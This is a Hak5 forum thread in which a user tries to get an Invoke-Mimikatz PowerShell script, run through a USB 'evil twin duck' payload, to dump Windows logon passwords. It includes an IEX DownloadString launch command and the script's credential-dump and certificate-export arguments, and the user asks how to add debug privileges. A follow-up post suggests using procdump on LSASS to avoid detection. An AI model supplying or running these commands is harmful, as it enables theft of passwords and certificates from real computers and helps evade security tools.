derjussar Posted November 17, 2016 Share Posted November 17, 2016 Afternoon all - I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it. Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds" Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list When I read thru the powershell script, it's missing the privilege line: "privilege::debug" The below portion of the script is what I think I need to modify because if I modify it to run the priv command only, the script executes and works (returns Privilege '20' OK) How do I run the priv command and then the dump passwords command? if ($PsCmdlet.ParameterSetName -ieq "DumpCreds") { $ExeArgs = "sekurlsa::logonpasswords Exit" } elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts") { $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit" } else { $ExeArgs = $Command } Quote Link to comment Share on other sites More sharing options...
derjussar Posted November 18, 2016 Author Share Posted November 18, 2016 I think I'm just gonna use procdump to dumb the creds and then view them later with mimikatz seeing how procdump is a "trusted" windows tool! Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.